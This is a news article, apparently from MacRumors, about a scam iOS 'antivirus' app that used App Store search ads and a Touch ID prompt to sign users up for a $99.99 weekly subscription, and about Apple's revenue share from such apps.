Given the terrible title of this app (inconsistent capitalization, misplaced colon, and grammatically nonsensical "Clean & Security VPN?"), I was sure this was a bug in the rankings algorithm. So I check Sensor Tower for an estimate of the app’s revenue, which showed… $80,000 per month?? That couldn’t possibly be right. Now I was really curious.

To learn how this could be, Lin installed and ran the app, and was soon prompted to start a "free trial" for an "anti-virus scanner" (iOS does not need anti-virus software thanks to Apple’s sandboxing rules for individual apps). Tapping on the trial offer then threw up a Touch ID authentication prompt containing the text "You will pay $99.99 for a 7-day subscription starting Jun 9, 2017".



Lin was one touch away from paying $400 a month for a non-existent service offered by a scammer.

It suddenly made a lot of sense how this app generates $80,000 a month. At $400/month per subscriber, it only needs to scam 200 people to make $80,000/month, or $960,000 a year. Of that amount, Apple takes 30%, or $288,000 — from just this one app.

Lin went on to explain how dishonorable developers are able to take advantage of Apple’s App Store search ads product because there’s no filtering or approval process involved. Not only that, the ads look almost indistinguishable from real results in the store, and some ads take up the entire first page of search results.

Lin dug deeper and found several other similar apps making money off the same scam, suggesting a wider, disturbing trend, with scam apps regularly showing up in the App Store’s top-grossing lists.

It’s unclear at this point how these apps managed to make it onto the App Store in the first place given Apple’s usually stringent approval process, or whether changes to the search ads system in iOS 11 will prevent this immoral practice from occurring. We’ll be sure to update this article if we hear more from Apple.

In the meantime, users should report scam apps when they see them and inform less savvy friends of this scamming trend until something is done to eradicate it.


from MacRumors : Mac News and Rumors http://ift.tt/2stef6D